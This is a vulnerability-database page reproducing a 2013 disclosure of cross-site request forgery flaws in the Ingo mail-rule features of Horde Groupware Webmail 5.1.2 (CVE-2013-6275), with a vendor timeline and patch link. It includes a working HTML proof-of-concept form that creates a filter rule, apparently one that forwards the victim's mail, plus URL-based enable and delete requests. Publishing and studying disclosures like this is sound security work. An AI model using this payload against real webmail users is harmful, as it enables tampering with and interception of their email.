Vulners
Lucene search
Horde Groupware Web Mail 5.1.2 Cross Site Request Forgery
🗓️ 27 Oct 2013 00:00:00Reported by Marcela BenetrixType 
packetstorm🔗 packetstormsecurity.com👁 35 Views
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Horde Groupware Web Mail Edition 5.1.2 - CSRF Vulnerability | 1 Nov 201300:00 | – | zdt |
 | CVE-2013-6275 | 4 Feb 202409:16 | – | circl |
 | Horde Groupware Webmail Edition Ingo Filter Cross-Site Request Forgery (CVE-2013-6275) | 5 Nov 201300:00 | – | checkpoint_advisories |
 | CVE-2013-6275 | 5 Nov 201918:50 | – | cve |
 | CVE-2013-6275 | 5 Nov 201918:50 | – | cvelist |
 | CVE-2013-6275 | 5 Nov 201918:50 | – | debiancve |
 | Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1) | 29 Oct 201300:00 | – | exploitdb |
 | EUVD-2013-6103 | 7 Oct 202500:30 | – | euvd |
 | Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (1) | 29 Oct 201300:00 | – | exploitpack |
 | CVE-2013-6275 | 5 Nov 201919:15 | – | nvd |
10
`#############################
Exploit Title : Multiple CSRF Horde Groupware Web mail Edition
Author:Marcela Benetrix
Date: 10/25/13
version: 5.1.2
software link:http://www.horde.org/apps/webmail
#############################
GroupWare Web mail Edition
Horde Groupware Webmail Edition is a free, enterprise ready, browser based communication suite. Users can read, send and organize email messages and manage and share calendars, contacts, tasks, notes, files, and bookmarks with the standards compliant components from the Horde Project
##########################
CSRF Location
Several functionalities from Rules section were found to miss the token so as to prevent CSRF
##########################
POC
A <body>
<form action="...../horde/ingo/basic.php?page=rule" method="POST">
<input type="hidden" name="actionID" value="rule_save" />
<input type="hidden" name="conditionnumber" value="-1" />
<input type="hidden" name="name" value="TestingCSRF" />
<input type="hidden" name="combine" value="1" />
<input type="hidden" name="field[0]" value="From" />
<input type="hidden" name="match[0]" value="contains" />
<input type="hidden" name="value[0]"
value="[email protected]" />
<input type="hidden" name="field[1]" value="" />
<input type="hidden" name="action" value="4" />
<input type="hidden" name="actionvalue"
value="[email protected]" />
<input type="hidden" name="stop" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
These were found at:
* Creating a rule
* Updating
* Enabling
(http://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=2&actionID=rule_enable)
* Deleting ( url-based https://www.test.com/horde/ingo/basic.php?page=filters&rulenumber=6&actionID=rule_delete)
###########################
CVE identifier
CVE-2013-6275.
##########################
Vendor Notification
10/25/2013 to: the developers. They replied immediately and fixed the problem launching a patch: http://bugs.horde.org/ticket/12796
10/28/2013: Disclosure
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Oct 2013 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.02072